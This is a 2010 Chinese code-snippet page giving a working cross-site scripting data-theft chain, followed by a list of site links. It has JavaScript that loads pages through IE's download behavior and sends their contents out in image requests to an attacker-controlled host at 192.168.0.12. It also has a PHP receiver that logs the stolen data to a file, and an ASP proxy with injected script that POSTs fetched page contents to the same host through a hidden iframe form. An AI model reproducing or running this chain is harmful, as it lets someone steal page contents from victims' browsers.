xss文件页面内容读取(解决)


Posted in Javascript onNovember 28, 2010

js:

document.body.addBehavior("#default#Download"); 
var mycars = new Array(); 
mycars[0] = "l.htm"; 
mycars[1] = "y.htm"; 
for (x in mycars ) 
{ 
if(document.body.startDownload(mycars[x],GetData)){ 
GetData(source); 
} 
} function GetData(source) 
{ 
txt=escape(source); 
getReaded(txt); 
} 
function getReaded(usr) { 
var newimg = new Image(); 
newimg.src="http://192.168.0.12/style.php?key="+"\n"+"\n"+usr+"\n"+"\n"; 
}

php:

<?php 
header('Content-Type:text/html;charset=GB2312'); 
function unescape($str) { 
$str = rawurldecode($str); 
preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r); 
$ar = $r[0]; 
foreach($ar as $k=>$v) { 
if(substr($v,0,2) == "%u") 
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4))); 
elseif(substr($v,0,3) == "&#x") 
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1))); 
elseif(substr($v,0,2) == "&#") { 
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1))); 
} 
} 
return join("",$ar); 
} 
$file="news.html"; 
$_GET['key']=unescape($_GET['key']); 
fputs(fopen($file,'a+'),$_GET['key']); 
?>

=================================================以下通用了===============
<% 
Response.Buffer = True 
Dim sUrlB,send(2) 
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm")) 
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm")) 
function PageWebProxy(xmlpath) 
Dim i, re, Url, Html 
Url = xmlpath Set re = New RegExp 
re.IgnoreCase = True 
re.Global = True 
sUrlB = Url 
Html = getHTTPPage(Url) 
Url = Left(Url, InStrRev(Url, "/")) 
i = InStr(sUrlB, "?") 
If i > 0 Then 
sUrlB = Left(sUrlB, i - 1) 
End If 
re.Pattern = "(href|action)=(\'|"")?(\?)" 
Html = re.Replace(Html,"$1=$2" & sUrlB & "?") 
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1x=$2$3$2") 
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1x($2$3$2)") 
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2" & Url & "$3$2") 
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2") 
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?" 
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2") 
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2" & Url & "$3$2)") 
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" 
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)") 
Html = Replace(Html, "&", "%26") 
If Split(Url, "/")(2) = "club.isso.com.cn" Then 
Html = Replace(Html, "%26amp;", "%26") 
Else 
Html = Replace(Html, "%26amp;", "&") 
End If 
Html = Replace(Html, "%26nbsp;", " ") 
Html = Replace(Html, "%26lt;", "<") 
Html = Replace(Html, "%26gt;", ">") 
Html = Replace(Html, "%26quot;", """) 
Html = Replace(Html, "%26copy;", "©") 
Html = Replace(Html, "%26reg;", "®") 
Html = Replace(Html, "%26raquo;", "»") 
Html = Replace(Html, "%26%26", "&&") 
Html = Replace(Html, "%26#", "&#") 
' Html = Replace(Html, "%26", "") 
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" 
Html = re.Replace(Html,"$1=$2$3$2") 
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))" 
Html = re.Replace(Html,"?url=$1") 
re.Pattern = "\?url=" & Url & "(#|javascript:)" 
Html = re.Replace(Html,"$1") 
re.Pattern = "multipart\/form-data" 
Html = re.Replace(Html,"") 
PageWebProxy=Html 
End function 
Function getHTTPPage(url) 
Dim Http, theStr, fileExt 
Set Http = Server.CreateObject("MSXML2.XMLHTTP") 
If Request.Form.Count > 0 Then 
For Each x In Request.Form 
theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&" 
Next 
Http.Open "POST", url, False 
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded" 
Http.Send(theStr) 
Else 
Http.Open "GET", url, False 
Http.Send() 
End If 
If Http.readystate<>4 then Exit Function 
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1)) 
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then 
Response.Clear 
Response.BinaryWrite Http.responseBody 
Response.End() 
Else 
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then 
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1) 
Response.BinaryWrite Http.responseBody 
Response.Flush 
Else 
getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312") 
End If 
End If 
Set Http = Nothing 
End Function 
Function BytesToBstr(body,Cset) 
Dim objstream 
Set objstream = Server.CreateObject("adodb.stream") 
objstream.Type = 1 
objstream.Mode =3 
objstream.Open 
objstream.Write body 
objstream.Position = 0 
objstream.Type = 2 
objstream.Charset = Cset 
BytesToBstr = objstream.ReadText 
objstream.Close 
Set objstream = nothing 
End Function 
%> 
document.writeln("<iframe name=\"mimi\" src=about:blank style=display:none><\/iframe>") 
document.writeln("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=POST target=mimi>"); 
document.writeln("<input id=var name=var type=hidden>"); 
document.writeln("<input id=vartwo name=vartwo type=hidden>"); 
document.writeln("<input type=submit style=display:none>"); 
document.writeln("<\/form>") 
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>'); 
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>'); 
document.getElementById("form").submit();
Javascript 相关文章推荐
jQuery侧边栏随窗口滚动实现方法
Mar 04 Javascript
jQuery 重复加载错误以及修复方法
Dec 16 Javascript
javascript Promise简单学习使用方法小结
May 17 Javascript
功能强大的Bootstrap使用手册(一)
Aug 02 Javascript
angular ngClick阻止冒泡使用默认行为的方法
Nov 03 Javascript
bootstrap实现图片自动轮播
Dec 21 Javascript
Javascript DOM事件操作小结(监听鼠标点击、释放,悬停、离开等)
Jan 20 Javascript
JavaScript优化以及前段开发小技巧
Feb 02 Javascript
你有必要知道的10个JavaScript难点
Jul 25 Javascript
layui radio性别单选框赋值方法
Aug 15 Javascript
JavaScript 预解析的4种实现方法解析
Sep 03 Javascript
Node.js API详解之 V8模块用法实例分析
Jun 05 Javascript
用js来解决ajax读取页面乱码
Nov 28 #Javascript
window.name代替cookie的实现代码
Nov 28 #Javascript
在一个js文件里远程调用jquery.js会在ie8下的一个奇怪问题
Nov 28 #Javascript
一个网马的tips实现分析
Nov 28 #Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
You might like
在 PHP 中使用随机数的三个步骤
2006/10/09 PHP
社区(php&amp;&amp;mysql)二
2006/10/09 PHP
PHP下获取上个月、下个月、本月的日期(strtotime,date)
2014/02/02 PHP
PHP使用JSON和将json还原成数组
2015/02/12 PHP
PHP性能优化大全(php.ini)
2016/05/20 PHP
phpwind放自动注册方法
2006/12/02 Javascript
解析jQuery与其它js(Prototype)库兼容共存
2013/07/04 Javascript
推荐4个原生javascript常用的函数
2015/01/12 Javascript
详解JavaScript中void语句的使用
2015/06/04 Javascript
JS脚本根据手机浏览器类型跳转WAP手机网站(两种方式)
2015/08/04 Javascript
使用开源工具制作网页验证码的方法
2016/10/17 Javascript
网站发布后Bootstrap框架引用woff字体无法正常显示的解决方法
2016/11/24 Javascript
js中字符型和数值型数字的互相转化方法(必看)
2017/04/25 Javascript
php register_shutdown_function函数详解
2017/07/23 Javascript
jQuery除指定区域外点击任何地方隐藏DIV功能
2017/11/13 jQuery
微信小程序实现图片上传、删除和预览功能的方法
2017/12/18 Javascript
图文讲解用vue-cli脚手架创建vue项目步骤
2019/02/12 Javascript
Angular之jwt令牌身份验证的实现
2020/02/14 Javascript
node.js文件的复制、创建文件夹等相关操作
2021/02/05 Javascript
python中的装饰器详解
2015/04/13 Python
Python3 利用requests 库进行post携带账号密码请求数据的方法
2018/10/26 Python
Python使用pandas对数据进行差分运算的方法
2018/12/22 Python
centos 安装Python3 及对应的pip教程详解
2019/06/28 Python
美国汽配连锁巨头Pep Boys官网:轮胎更换、汽车维修服务和汽车零部件
2017/01/14 全球购物
英国天然抗衰老护肤品品牌:Nakin Skin Care
2019/04/16 全球购物
装饰活动策划方案
2014/02/11 职场文书
幼儿园教学随笔感言
2014/02/23 职场文书
2015年度房地产工作总结
2015/04/09 职场文书
2015年化验员工作总结
2015/04/10 职场文书
营业员岗位职责范本
2015/04/14 职场文书
广告文案的撰写技巧(实用干货)
2019/08/23 职场文书
导游词之镜泊湖
2019/12/09 职场文书
Python基础详解之描述符
2021/04/28 Python
Java实现斗地主之洗牌发牌
2021/06/14 Java/Android
Java获取e.printStackTrace()打印的信息方式
2021/08/07 Java/Android
Go中使用gjson来操作JSON数据的实现
2022/08/14 Golang